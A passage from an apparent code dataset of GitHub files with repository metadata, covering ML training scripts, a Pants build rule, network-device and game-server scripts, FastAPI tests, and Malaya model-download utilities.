torch.max(outputs, 1)\n train_acc += (preds[1] == targets).sum().item()\n\n # 计算平均训练损失和正确率\n train_loss = train_loss / train_num\n train_acc = train_acc / train_num\n # 计算平均验证损失和正确率\n print(\"第{}轮训练平均损失值为{}\".format(i + 21, train_loss))\n print(\"第{}轮训练正确率为{}\".format(i + 21, train_acc))\n\n end_time = time.time()\n print(\"第{}轮训练用时{}秒\".format(i + 21, end_time - temp_time))\n temp_time = end_time\n\n # 保存模型\n torch.save(model, \"vgg16_caltech256.pth\")\n print(\"本轮模型已保存\")\n print(\"--------------第{}轮训练结束:---------------\".format(i + 21))\n\nend_time = time.time() # 结束时间\nprint(\"共用时{}秒\".format(end_time-start_time))\n\n","repo_name":"g1823/GraduationDesign-Classification","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26040627146","text":"from __future__ import annotations\n\nfrom dataclasses import dataclass\n\nfrom pants.backend.kotlin.subsystems.kotlin import KotlinSubsystem\nfrom pants.backend.kotlin.target_types import KotlinJunitTestDependenciesField\nfrom pants.build_graph.address import Address\nfrom pants.engine.internals.selectors import Get\nfrom pants.engine.rules import collect_rules, rule\nfrom pants.engine.target import FieldSet, InferDependenciesRequest, InferredDependencies\nfrom pants.engine.unions import UnionRule\nfrom pants.jvm.dependency_inference.artifact_mapper import (\n AllJvmArtifactTargets,\n find_jvm_artifacts_or_raise,\n)\nfrom pants.jvm.resolve.common import Coordinate\nfrom pants.jvm.subsystems import JvmSubsystem\nfrom pants.jvm.target_types import JvmResolveField\n\n\n@dataclass(frozen=True)\nclass KotlinJunitTestDependencyInferenceFieldSet(FieldSet):\n required_fields = (KotlinJunitTestDependenciesField, JvmResolveField)\n\n dependencies: KotlinJunitTestDependenciesField\n resolve: JvmResolveField\n\n\nclass InferKotlinJunitTestDependencyRequest(InferDependenciesRequest):\n infer_from = KotlinJunitTestDependencyInferenceFieldSet\n\n\n@dataclass(frozen=True)\nclass KotlinJunitLibrariesForResolveRequest:\n resolve_name: str\n\n\n@dataclass(frozen=True)\nclass KotlinJunitLibrariesForResolve:\n addresses: frozenset[Address]\n\n\n@rule\nasync def resolve_kotlin_junit_libraries_for_resolve(\n request: KotlinJunitLibrariesForResolveRequest,\n jvm_artifact_targets: AllJvmArtifactTargets,\n jvm: JvmSubsystem,\n kotlin_subsystem: KotlinSubsystem,\n) -> KotlinJunitLibrariesForResolve:\n kotlin_version = kotlin_subsystem.version_for_resolve(request.resolve_name)\n addresses = find_jvm_artifacts_or_raise(\n required_coordinates=[\n Coordinate(\n group=\"org.jetbrains.kotlin\",\n artifact=\"kotlin-test-junit\",\n version=kotlin_version,\n ),\n ],\n resolve=request.resolve_name,\n jvm_artifact_targets=jvm_artifact_targets,\n jvm=jvm,\n subsystem=\"the Kotlin test runtime for JUnit\",\n target_type=\"kotlin_junit_tests\",\n requirement_source=\"the relevant entry for this resolve in the `[kotlin].version_for_resolve` option\",\n )\n return KotlinJunitLibrariesForResolve(addresses)\n\n\n@rule(desc=\"Infer dependency on Kotlin Junit support artifact.\")\nasync def infer_kotlin_junit_dependency(\n request: InferKotlinJunitTestDependencyRequest,\n jvm: JvmSubsystem,\n) -> InferredDependencies:\n resolve = request.field_set.resolve.normalized_value(jvm)\n\n kotlin_junit_libraries = await Get(\n KotlinJunitLibrariesForResolve, KotlinJunitLibrariesForResolveRequest(resolve)\n )\n return 
InferredDependencies(kotlin_junit_libraries.addresses)\n\n\ndef rules():\n return (\n *collect_rules(),\n UnionRule(InferDependenciesRequest, InferKotlinJunitTestDependencyRequest),\n )\n","repo_name":"pantsbuild/pants","sub_path":"src/python/pants/backend/kotlin/test/junit.py","file_name":"junit.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":2896,"dataset":"github-code","pt":"6"} +{"seq_id":"40411379291","text":"#!/usr/bin/env python3\n\"\"\"\nName: mac_address_count.py\nDescription: NXAPI: display mac address-table count\n\nExample output:\n\n% ./mac_address_count.py --vault hashicorp --devices cvd_leaf_1,cvd_l2_fanout\nip device vlan total dyn otv rvtep static secure\n192.168.11.102 cvd-1311-leaf all 9 3 6 0 0 0\n192.168.11.116 cvd_l2_911 all 25 25 0 0 0 0\n% \n\"\"\"\nour_version = 107\nscript_name = \"mac_address_count\"\n\n# standard libraries\nimport argparse\nfrom concurrent.futures import ThreadPoolExecutor\n\n# local libraries\nfrom nxapi_netbox.args.args_cookie import ArgsCookie\nfrom nxapi_netbox.args.args_nxapi_tools import ArgsNxapiTools\nfrom nxapi_netbox.general.log import get_logger\nfrom nxapi_netbox.netbox.netbox_session import netbox, get_device_mgmt_ip\nfrom nxapi_netbox.vault.vault import get_vault\nfrom nxapi_netbox.nxapi.nxapi_mac_address_table import NxapiMacCount\nfrom nxapi_netbox.nxapi.nxapi_vlan import NxapiVlanId\n\n\ndef get_parser():\n help_vlan = \"the vlan in which to query mac address-table count. If not specified, printed values represent totals for all vlans\"\n ex_vlan = \"--vlan 42\"\n\n parser = argparse.ArgumentParser(\n description=\"DESCRIPTION: NXAPI: display mac address-table count\",\n parents=[ArgsCookie, ArgsNxapiTools],\n )\n default = parser.add_argument_group(title=\"DEFAULT SCRIPT ARGS\")\n mandatory = parser.add_argument_group(title=\"MANDATORY SCRIPT ARGS\")\n\n default.add_argument(\n \"--vlan\",\n dest=\"vlan\",\n required=False,\n default=0,\n help=\"default {} {} {}\".format(\"%(default)s\", help_vlan, ex_vlan),\n )\n\n parser.add_argument(\n \"--version\", action=\"version\", version=\"{} v{}\".format(\"%(prog)s\", our_version)\n )\n return parser.parse_args()\n\n\ndef get_device_list():\n try:\n return cfg.devices.split(\",\")\n except:\n log.error(\n \"exiting. Cannot parse --devices {}. Example usage: --devices leaf_1,spine_2,leaf_2\".format(\n cfg.devices\n )\n )\n exit(1)\n\n\ndef print_output(futures):\n for future in futures:\n output = future.result()\n if output == None:\n continue\n for line in output:\n print(line)\n\n\ndef verify_vlan(ip, vault):\n if cfg.vlan == 0:\n return True\n nx = NxapiVlanId(vault.nxos_username, vault.nxos_password, ip, log)\n nx.nxapi_init(cfg)\n nx.vlan = cfg.vlan\n nx.refresh()\n if not nx.vlan_id:\n log.error(\n \"Exiting. 
vlan {} does not exist on {}.\".format(cfg.vlan, nx.hostname)\n )\n return False\n return True\n\n\ndef print_header():\n print(\n fmt.format(\n \"ip\", \"device\", \"vlan\", \"total\", \"dyn\", \"otv\", \"rvtep\", \"static\", \"secure\"\n )\n )\n\n\ndef worker(device, vault):\n ip = get_device_mgmt_ip(nb, device)\n lines = list()\n if not verify_vlan(ip, vault):\n return lines\n nx = NxapiMacCount(vault.nxos_username, vault.nxos_password, ip, log)\n nx.nxapi_init(cfg)\n nx.vlan = cfg.vlan\n nx.refresh()\n if nx.vlan == 0:\n vlan = \"all\"\n else:\n vlan = nx.vlan\n lines.append(\n fmt.format(\n ip,\n nx.hostname,\n vlan,\n nx.total_cnt,\n nx.dyn_cnt,\n nx.otv_cnt,\n nx.rvtep_static_cnt,\n nx.static_cnt,\n nx.secure_cnt,\n )\n )\n return lines\n\n\ncfg = get_parser()\nlog = get_logger(script_name, cfg.loglevel, \"DEBUG\")\nvault = get_vault(cfg.vault)\nvault.fetch_data()\nnb = netbox(vault)\n\ndevices = get_device_list()\n\nfmt = \"{:<15} {:<18} {:>4} {:>7} {:>7} {:>7} {:>5} {:>7} {:>7}\"\nprint_header()\n\nexecutor = ThreadPoolExecutor(max_workers=len(devices))\nfutures = list()\nfor device in devices:\n args = [device, vault]\n futures.append(executor.submit(worker, *args))\nprint_output(futures)\n","repo_name":"allenrobel/nxapi-netbox","sub_path":"scripts/mac_address_count.py","file_name":"mac_address_count.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"20928836405","text":"import tensorflow as tf\n\n\"\"\"\nThere are various data augmentations for training object detectors.\n\n`image` is assumed to be a float tensor with shape [height, width, 3],\nit is a RGB image with pixel values in range [0, 1].\n\"\"\"\n\n\ndef random_color_manipulations(image, probability=0.5, grayscale_probability=0.1):\n\n def manipulate(image):\n # intensity and order of this operations are kinda random,\n # so you will need to tune this for you problem\n image = tf.image.random_brightness(image, 0.1)\n image = tf.image.random_contrast(image, 0.8, 1.2)\n image = tf.image.random_hue(image, 0.1)\n image = tf.image.random_saturation(image, 0.8, 1.2)\n image = tf.clip_by_value(image, 0.0, 1.0)\n return image\n\n def to_grayscale(image):\n image = tf.image.rgb_to_grayscale(image)\n image = tf.image.grayscale_to_rgb(image)\n return image\n\n with tf.name_scope('random_color_manipulations'):\n do_it = tf.less(tf.random_uniform([]), probability)\n image = tf.cond(do_it, lambda: manipulate(image), lambda: image)\n\n with tf.name_scope('to_grayscale'):\n make_gray = tf.less(tf.random_uniform([]), grayscale_probability)\n image = tf.cond(make_gray, lambda: to_grayscale(image), lambda: image)\n\n return image\n\n\ndef random_flip_left_right(image, boxes):\n\n def flip(image, boxes):\n flipped_image = tf.image.flip_left_right(image)\n ymin, xmin, ymax, xmax = tf.unstack(boxes, axis=1)\n flipped_xmin = tf.subtract(1.0, xmax)\n flipped_xmax = tf.subtract(1.0, xmin)\n flipped_boxes = tf.stack([ymin, flipped_xmin, ymax, flipped_xmax], 1)\n return flipped_image, flipped_boxes\n\n with tf.name_scope('random_flip_left_right'):\n do_it = tf.less(tf.random_uniform([]), 0.5)\n image, boxes = tf.cond(do_it, lambda: flip(image, boxes), lambda: (image, boxes))\n return image, boxes\n\n\ndef random_pixel_value_scale(image, minval=0.9, maxval=1.1, probability=0.5):\n \"\"\"This function scales each pixel independently of the other ones.\n\n Arguments:\n image: a float tensor with shape [height, width, 3],\n an image with pixel 
values varying between [0, 1].\n        minval: a float number, lower ratio of scaling pixel values.\n        maxval: a float number, upper ratio of scaling pixel values.\n        probability: a float number.\n    Returns:\n        a float tensor with shape [height, width, 3].\n    \"\"\"\n    def random_value_scale(image):\n        color_coefficient = tf.random_uniform(\n            tf.shape(image), minval=minval,\n            maxval=maxval, dtype=tf.float32\n        )\n        image = tf.multiply(image, color_coefficient)\n        image = tf.clip_by_value(image, 0.0, 1.0)\n        return image\n\n    with tf.name_scope('random_pixel_value_scale'):\n        do_it = tf.less(tf.random_uniform([]), probability)\n        image = tf.cond(do_it, lambda: random_value_scale(image), lambda: image)\n    return image\n\n\ndef random_jitter_boxes(boxes, ratio=0.05):\n    \"\"\"Randomly jitter bounding boxes.\n\n    Arguments:\n        boxes: a float tensor with shape [N, 4].\n        ratio: a float number.\n            The ratio of the box width and height that the corners can jitter.\n            For example if the width is 100 pixels and ratio is 0.05,\n            the corners can jitter up to 5 pixels in the x direction.\n    Returns:\n        a float tensor with shape [N, 4].\n    \"\"\"\n    def random_jitter_box(box, ratio):\n        \"\"\"Randomly jitter a box.\n        Arguments:\n            box: a float tensor with shape [4].\n            ratio: a float number.\n        Returns:\n            a float tensor with shape [4].\n        \"\"\"\n        ymin, xmin, ymax, xmax = [box[i] for i in range(4)]\n        box_height, box_width = ymax - ymin, xmax - xmin\n        hw_coefs = tf.stack([box_height, box_width, box_height, box_width])\n\n        rand_numbers = tf.random_uniform(\n            [4], minval=-ratio, maxval=ratio, dtype=tf.float32\n        )\n        hw_rand_coefs = tf.multiply(hw_coefs, rand_numbers)\n\n        jittered_box = tf.add(box, hw_rand_coefs)\n        return jittered_box\n\n    with tf.name_scope('random_jitter_boxes'):\n        distorted_boxes = tf.map_fn(\n            lambda x: random_jitter_box(x, ratio),\n            boxes, dtype=tf.float32, back_prop=False\n        )\n        distorted_boxes = tf.clip_by_value(distorted_boxes, 0.0, 1.0)\n    return distorted_boxes\n","repo_name":"TropComplique/FaceBoxes-tensorflow","sub_path":"src/input_pipeline/other_augmentations.py","file_name":"other_augmentations.py","file_ext":"py","file_size_in_byte":4446,"program_lang":"python","lang":"en","doc_type":"code","stars":179,"dataset":"github-code","pt":"6"}
{"seq_id":"73568932348","text":"from time import sleep\nimport socket as s\nimport threading\n\nsocket = None\njugadores = []\nnombres = []\n\ndef start():\n    global socket\n    socket = s.socket(s.AF_INET, s.SOCK_STREAM)\n    socket.bind(('', 9000))\n    socket.listen(3) \n    threading.Thread(target=handle_client, args=(socket,)).start()\n\ndef handle_client(sckt):\n    while True:\n        if len(jugadores) < 2:\n            client, addr = sckt.accept()\n            jugadores.append(client)\n            threading.Thread(\n                target=send_recv_data, \n                args=(client, addr)\n            ).start()\n\ndef send_recv_data(client_connection, client_ip_addr):\n    global socket, jugadores\n    # sockets carry bytes, so decode the name on receipt and encode on send\n    client_name = client_connection.recv(4096).decode()\n\n    client_connection.send(b'player1' if len(jugadores) < 2 else b'player2')\n    nombres.append(client_name)\n\n    if len(jugadores) > 1:\n        sleep(1)\n        jugadores[0].send(('opponent_name~' + nombres[1] + 'pieceO').encode())\n        jugadores[1].send(('opponent_name~' + nombres[0] + 'pieceX').encode())\n\n\n    while True:\n        data = client_connection.recv(4096)\n        if not data: break\n\n        if data.startswith(b\"~xy~\"):\n            # relay the move to player 1 or 2, depending on who sent it\n            jugadores[1 if client_connection == jugadores[0] else 0].send(data)\n\n    client_connection.close()\n\nif __name__ == \"__main__\":\n    i = 0\n    while True:\n        if i == 0:\n            i += 1\n            
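            # start() spins up the accept loop; per send_recv_data() above, each
            # client first sends its name, gets back b'player1'/b'player2', and
            # any later payload starting with b'~xy~' (a move) is relayed
            # verbatim to the opposing client.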
start()\n else: \n pass","repo_name":"gabrielurenah/tic-tac-toe","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24017819894","text":"from typing import Optional\n\nimport pytest\nfrom fastapi import Depends, FastAPI\nfrom fastapi.testclient import TestClient\nfrom fastapi_qp import QueryParam\nfrom pydantic import Field, ValidationError\nfrom pydantic.error_wrappers import ValidationError\nfrom pydantic.main import BaseModel\n\n\nclass DateParams(BaseModel, QueryParam):\n since: Optional[str] = Field(\n None, \n description=\"A date in the format YYYY-MM-DD\",\n min_length=10,\n max_length=10,\n regex=\"^[0-9]{4}-[0-9]{2}-[0-9]{2}$\",\n )\n until: Optional[str] = Field(\n None, \n description=\"A date in the format YYYY-MM-DD\",\n min_length=10,\n max_length=10,\n regex=\"^[0-9]{4}-[0-9]{2}-[0-9]{2}$\"\n )\n\nclass PaginationParams(BaseModel, QueryParam):\n offset: int = Field(\n 0, \n description=\"Items ignored from the beginning of the list\",\n gte=0,\n )\n limit: int = Field(\n 100, \n description=\"Number of items per result\",\n ge=0,\n le=1000\n )\n\nclass CommonParams(PaginationParams, DateParams):\n pass\n\napp = FastAPI()\n\n@app.get(\"/\")\nasync def read(params: CommonParams = Depends(CommonParams.params())):\n return params.dict()\n\nclient = TestClient(app)\n\ndef test_no_params():\n response = client.get(\"/\")\n assert response.json()['since'] == None\n\ndef test_single_param():\n response = client.get(\"/\" + CommonParams(since='2020-01-01').to_url())\n assert response.json()['since'] == '2020-01-01'\n\ndef test_multiple_params():\n response = client.get(\"/\" + CommonParams(since='2020-01-01', limit=50).to_url())\n assert response.json()['since'] == '2020-01-01'\n assert response.json()['limit'] == 50\n\ndef test_invalid_param():\n with pytest.raises(ValidationError):\n client.get(\"/\" + CommonParams(limit=1001).to_url())\n\ndef test_no_param_url():\n assert CommonParams().to_url() == None\n","repo_name":"clicampo/fastapi-qp","sub_path":"test/test_qp.py","file_name":"test_qp.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"6"} +{"seq_id":"26203947926","text":"from spillbrett import Spillbrett\r\n \r\ndef hovedprogram():\r\n #Bruker kan bestemme størrelse på brettet\r\n brettStorrelse = input(\"Hvor mange stort skal brettet være? 
(eks: '10 10' gir et brett på 10x10 ruter) \").split()\r\n\r\n #Gjør tester for at brukerinput er logisk (todimensjonalt brett / mindre enn 30 * 30-brett)\r\n if len(brettStorrelse) > 2 or int(brettStorrelse[0]) > 30 and int(brettStorrelse[1]) > 30 or int(brettStorrelse[0]) < 3 or int(brettStorrelse[1]) < 3:\r\n print(\"Ugyldig input\")\r\n \r\n else:\r\n #Dersom brukerinput er lovlig lages et nytt brett\r\n nyttSpill = Spillbrett(brettStorrelse[0], brettStorrelse[1])\r\n\r\n nesteGen = True\r\n \r\n #Sjekker videre dirigering av bruker (q for å avslutte / enter for å fortsette)\r\n while nesteGen:\r\n \r\n #Tegner opp brettet\r\n nyttSpill.tegnBrett()\r\n #Får inn brukerinput\r\n nyGen = input(\"\\nTrykk 'Enter' å gå til neste generasjon eller 'Q' for å avslutte \").lower()\r\n\r\n #Avslutter programmet dersom bruker taster inn 'q' eller alle cellene er døde\r\n if nyGen == \"q\" or nyttSpill.antallLevendeCeller() == 0:\r\n print(\"Program avsluttes...\")\r\n nesteGen = False\r\n else:\r\n nyttSpill.oppdatering()\r\n\r\n\r\nhovedprogram()","repo_name":"JohaBju/python","sub_path":"cellespill/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"7080708223","text":"import os\nimport torch\nfrom PIL import Image\n\n# For loading pre-train model\nimport pytorch_lightning as pl\nfrom transformers import ViTForImageClassification\nfrom transformers.optimization import AdamW\nfrom torch.utils.data import random_split\n\n# For dataloading\nfrom math import floor\nfrom torch import manual_seed\nfrom torchvision.datasets import ImageFolder\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\n\n# For loggin loss, acc, ckpt\nfrom pytorch_lightning.loggers import TensorBoardLogger\n\n# Training Data transformation\npokemon_train_transforms = transforms.Compose(\n [\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n ]\n)\n\nclass PokemonClassifier(pl.LightningModule):\n def __init__(self):\n super().__init__()\n # Pretrain Model\n model_name = \"google/vit-base-patch16-224\"\n self.model = ViTForImageClassification.from_pretrained(model_name)\n self.model.num_labels = 150 # number of pokemon classes\n self.model.classifier = torch.nn.Linear(768, self.model.num_labels)\n # Hyper-parameters\n self.batch_size = 16\n self.lr = 5e-5\n # Data roots\n self.data_root = \"C:/study/ee576/project/data/PokemonData\"\n self.ckpt_dir = \"C:/study/ee576/project/ee576-cv-vit/models/logs/pokemon/version_4/checkpoints\"\n\n def prepare_data(self):\n manual_seed(80)\n dataset = ImageFolder(self.data_root, pokemon_train_transforms)\n val_size = floor((len(dataset)) * 0.10) # train:val -> 90:10\n train_size = len(dataset) - val_size\n self.train_ds, self.test_ds = random_split(dataset, [train_size, val_size])\n\n def configure_optimizers(self): # used by pytorch-lightning\n return AdamW(self.parameters(), lr=self.lr, weight_decay=0.01)\n\n def forward(self, batch, batch_idx):\n return self.model(batch[0].squeeze(), labels=batch[1].squeeze())\n\n def training_step(self, batch, batch_idx):\n loss = self(batch, batch_idx)[0]\n self.log(\"train_loss: \", loss)\n return loss\n\n def validation_step(self, batch, batch_idx):\n output = self(batch, batch_idx) # loss, pred_id\n loss = output[0]\n pred_labels = output[1].argmax(-1)\n gt_labels = batch[1].squeeze()\n accuracy = torch.sum(pred_labels == gt_labels) / self.batch_size\n self.log(\"val_accuracy: \", accuracy)\n 
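        # Note: dividing by self.batch_size overstates accuracy whenever the
        # final validation batch is smaller than batch_size; dividing by the
        # actual batch length would be safer, e.g.:
        #   accuracy = torch.sum(pred_labels == gt_labels) / gt_labels.numel()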
self.log(\"val_loss: \", loss)\n\n def train_dataloader(self):\n return DataLoader(\n self.train_ds, self.batch_size, shuffle=True, num_workers=2, pin_memory=True\n )\n\n def val_dataloader(self):\n return DataLoader(self.test_ds, self.batch_size, num_workers=2, pin_memory=True)\n\n\n### Fine-Tune(Train) Pokemon Classifier ###\nif __name__ == \"__main__\":\n PokeModel = PokemonClassifier()\n logger = TensorBoardLogger(\"logs\", name=\"pokemon\")\n trainer = pl.Trainer(\n accumulate_grad_batches=4,\n default_root_dir=\"logs\",\n accelerator=\"gpu\",\n devices=\"auto\",\n max_epochs=5,\n check_val_every_n_epoch=1,\n logger=logger,\n )\n trainer.fit(PokeModel)\n","repo_name":"christinewoo/ee576-cv-vit","sub_path":"models/vit_pokemon.py","file_name":"vit_pokemon.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24470856201","text":"import tensorflow as tf\nimport inspect\nimport numpy as np\nimport requests\nimport os\nimport logging\nfrom tqdm import tqdm\nfrom pathlib import Path\nfrom datetime import datetime\nfrom malaya import home, _delete_folder, gpu_available, __gpu__\n\nURL = 'https://f000.backblazeb2.com/file/malaya-model/'\n\n\ndef check_tf_version():\n version = tf.__version__\n return int(version.split('.')[0])\n\n\nif check_tf_version() > 1:\n import warnings\n\n warnings.warn(\n 'Cannot import beam_search_ops not available for Tensorflow 2, `deep_model` for stemmer will not available to use.'\n )\n\nelse:\n try:\n from tensorflow.contrib.seq2seq.python.ops import beam_search_ops\n except:\n import warnings\n\n warnings.warn(\n 'Cannot import beam_search_ops from tensorflow, `deep_model` for stemmer will not available to use, make sure Tensorflow 1 version >= 1.15'\n )\n\n\ndef download_file_cloud(url, filename):\n if 'http' not in url:\n url = URL + url\n r = requests.get(url, stream = True)\n total_size = int(r.headers['content-length'])\n version = int(r.headers.get('X-Bz-Upload-Timestamp', 0))\n os.makedirs(os.path.dirname(filename), exist_ok = True)\n with open(filename, 'wb') as f:\n for data in tqdm(\n iterable = r.iter_content(chunk_size = 1_048_576),\n total = total_size / 1_048_576,\n unit = 'MB',\n unit_scale = True,\n ):\n f.write(data)\n return version\n\n\ndef check_file_cloud(url):\n url = URL + url\n r = requests.head(url)\n exist = r.status_code == 200\n if exist:\n version = int(r.headers.get('X-Bz-Upload-Timestamp', 0))\n else:\n version = 0\n return exist, version\n\n\ndef check_files_local(file):\n for key, item in file.items():\n if 'version' in key:\n continue\n if not os.path.isfile(item):\n return False\n return True\n\n\ndef nodes_session(graph, inputs, outputs, extra = None, attention = None):\n input_nodes = {i: graph.get_tensor_by_name(f'import/{i}:0') for i in inputs}\n output_nodes = {\n o: graph.get_tensor_by_name(f'import/{o}:0') for o in outputs\n }\n if extra:\n extra = {k: graph.get_tensor_by_name(v) for k, v in extra.items()}\n output_nodes = {**output_nodes, **extra}\n if attention:\n output_nodes = {**output_nodes, **attention}\n return input_nodes, output_nodes\n\n\ndef generate_session(graph, **kwargs):\n config = tf.compat.v1.ConfigProto()\n if gpu_available():\n if 'gpu' in kwargs:\n config.allow_soft_placement = True\n\n if 'gpu_limit' in kwargs:\n try:\n gpu_limit = float(kwargs.get('gpu_limit', 0.999))\n except:\n raise ValueError('gpu_limit must be a float')\n if not 0 < gpu_limit < 1:\n raise ValueError('gpu_limit must 0 < 
gpu_limit < 1')\n\n config.gpu_options.per_process_gpu_memory_fraction = gpu_limit\n config.gpu_options.allow_growth = True\n\n sess = tf.compat.v1.Session(config = config, graph = graph)\n return sess\n\n\ndef get_device(**kwargs):\n device = 'CPU'\n no = 0\n if gpu_available():\n if 'gpu' in kwargs:\n gpu = kwargs.get('gpu', 0)\n if not isinstance(gpu, int):\n raise ValueError('gpu must an int')\n if not 0 <= gpu < len(__gpu__):\n raise ValueError(f'gpu must 0 <= gpu < {len(__gpu__)}')\n no = gpu\n device = 'GPU'\n return f'/device:{device}:{no}'\n\n\ndef load_graph(frozen_graph_filename, **kwargs):\n with tf.io.gfile.GFile(frozen_graph_filename, 'rb') as f:\n try:\n graph_def = tf.compat.v1.GraphDef()\n graph_def.ParseFromString(f.read())\n except Exception as e:\n path = frozen_graph_filename.split('Malaya/')[1]\n path = '/'.join(path.split('/')[:-1])\n raise Exception(\n f\"{e}, file corrupted due to some reasons, please run `malaya.clear_cache('{path}')` and try again\"\n )\n\n # https://github.com/onnx/tensorflow-onnx/issues/77#issuecomment-445066091\n # to fix import T5\n for node in graph_def.node:\n if node.op == 'RefSwitch':\n node.op = 'Switch'\n for index in xrange(len(node.input)):\n if 'moving_' in node.input[index]:\n node.input[index] = node.input[index] + '/read'\n elif node.op == 'AssignSub':\n node.op = 'Sub'\n if 'use_locking' in node.attr:\n del node.attr['use_locking']\n elif node.op == 'AssignAdd':\n node.op = 'Add'\n if 'use_locking' in node.attr:\n del node.attr['use_locking']\n elif node.op == 'Assign':\n node.op = 'Identity'\n if 'use_locking' in node.attr:\n del node.attr['use_locking']\n if 'validate_shape' in node.attr:\n del node.attr['validate_shape']\n if len(node.input) == 2:\n node.input[0] = node.input[1]\n del node.input[1]\n\n device = get_device(**kwargs)\n\n with tf.Graph().as_default() as graph:\n with tf.device(device):\n tf.import_graph_def(graph_def)\n return graph\n\n\ndef download_from_dict(file, s3_file, validate = True, quantized = False):\n if quantized:\n if 'quantized' not in file:\n f = file.replace(home, '').split('/')\n raise Exception(\n f'Quantized model for {f[1].upper()} module is not available, please load normal model.'\n )\n model = 'quantized'\n logging.warning('Load quantized model will cause accuracy drop.')\n else:\n model = 'model'\n if validate:\n base_location = os.path.dirname(file[model])\n version = os.path.join(base_location, 'version')\n download = False\n if os.path.isfile(version):\n with open(version) as fopen:\n if not file['version'] in fopen.read():\n print(f'Found old version of {base_location}, deleting..')\n _delete_folder(base_location)\n print('Done.')\n download = True\n else:\n for key, item in file.items():\n if not os.path.exists(item):\n download = True\n break\n else:\n download = True\n\n if download:\n for key, item in file.items():\n if 'version' in key:\n continue\n if model == 'quantized' and key == 'model':\n continue\n if model == 'model' and key == 'quantized':\n continue\n if not os.path.isfile(item):\n print(f'downloading frozen {key} to {item}')\n download_file_cloud(s3_file[key], item)\n with open(version, 'w') as fopen:\n fopen.write(file['version'])\n else:\n if not check_files_local(file):\n path = '/'.join(file[model].split('/')[:-1])\n raise Exception(\n f'{path} is not available, please `validate = True`'\n )\n\n\ndef download_from_string(\n path, module, keys, validate = True, quantized = False\n):\n model = path\n keys = keys.copy()\n keys['version'] = 'version'\n\n if 
quantized:\n        path = os.path.join(module, f'{path}-quantized')\n        quantized_path = os.path.join(path, 'model.pb')\n        if not check_file_cloud(quantized_path)[0]:\n            f = quantized_path.replace(home, '').split('/')\n            raise Exception(\n                f'Quantized model for `{os.path.join(module, model)}` is not available, please load the normal model.'\n            )\n        logging.warning('Loading a quantized model will cause an accuracy drop.')\n    else:\n        path = os.path.join(module, path)\n    path_local = os.path.join(home, path)\n    files_local = {'version': os.path.join(path_local, 'version')}\n    files_cloud = {}\n    for key, value in keys.items():\n        # if it is an absolute path, it is a shared file in the cloud, duplicated for each model\n        if '/' in value:\n            f_local = os.path.join(path_local, value.split('/')[-1])\n            f_cloud = value\n        # otherwise, combine using the `module` parameter\n        else:\n            f_local = os.path.join(path_local, value)\n            f_cloud = os.path.join(path, value)\n        files_local[key] = f_local\n        files_cloud[key] = f_cloud\n    if validate:\n        download = False\n        version = files_local['version']\n        latest = str(\n            max(\n                [check_file_cloud(item)[1] for key, item in files_cloud.items()]\n            )\n        )\n        if os.path.isfile(version):\n            with open(version) as fopen:\n                if latest not in fopen.read():\n                    p = os.path.dirname(version)\n                    print(f'Found old version in {p}, deleting..')\n                    _delete_folder(p)\n                    print('Done.')\n                    download = True\n                else:\n                    for key, item in files_local.items():\n                        if not os.path.exists(item):\n                            download = True\n                            break\n        else:\n            download = True\n\n        if download:\n            versions = []\n            for key, item in files_local.items():\n                if 'version' in key:\n                    continue\n                if not os.path.isfile(item):\n                    print(f'downloading frozen {key} to {item}')\n                    versions.append(download_file_cloud(files_cloud[key], item))\n            latest = str(max(versions))\n            with open(version, 'w') as fopen:\n                fopen.write(latest)\n\n    else:\n        if not check_files_local(files_local):\n            path = '/'.join(files_local['model'].split('/')[:-1])\n            raise Exception(\n                f'{path} is not available, please set `validate = True`'\n            )\n    return files_local\n\n\ndef check_file(\n    file,\n    s3_file = None,\n    module = None,\n    keys = None,\n    validate = True,\n    quantized = False,\n    **kwargs,\n):\n    if isinstance(file, dict) and isinstance(s3_file, dict):\n        download_from_dict(\n            file = file,\n            s3_file = s3_file,\n            validate = validate,\n            quantized = quantized,\n        )\n    else:\n        file = download_from_string(\n            path = file,\n            module = module,\n            keys = keys,\n            validate = validate,\n            quantized = quantized,\n        )\n    return file\n\n\nclass DisplayablePath(object):\n    display_filename_prefix_middle = '├──'\n    display_filename_prefix_last = '└──'\n    display_parent_prefix_middle = '    '\n    display_parent_prefix_last = '│   '\n\n    def __init__(self, path, parent_path, is_last):\n        self.path = Path(str(path))\n        self.parent = parent_path\n        self.is_last = is_last\n        if self.parent:\n            self.depth = self.parent.depth + 1\n        else:\n            self.depth = 0\n\n    @property\n    def displayname(self):\n        if self.path.is_dir():\n            return self.path.name + '/'\n        return self.path.name\n\n    @classmethod\n    def make_tree(cls, root, parent = None, is_last = False, criteria = None):\n        root = Path(str(root))\n        criteria = criteria or cls._default_criteria\n        displayable_root = cls(root, parent, is_last)\n        yield displayable_root\n\n        children = sorted(\n            list(path for path in root.iterdir() if criteria(path)),\n            key = lambda s: str(s).lower(),\n        )\n        count = 1\n        for path in children:\n            is_last = count == len(children)\n            if path.is_dir():\n                yield from cls.make_tree(\n                    path,\n                    parent = displayable_root,\n                    is_last = is_last,\n                    
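# propagate the same filter callback so nested directories are pruned consistently\n                    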
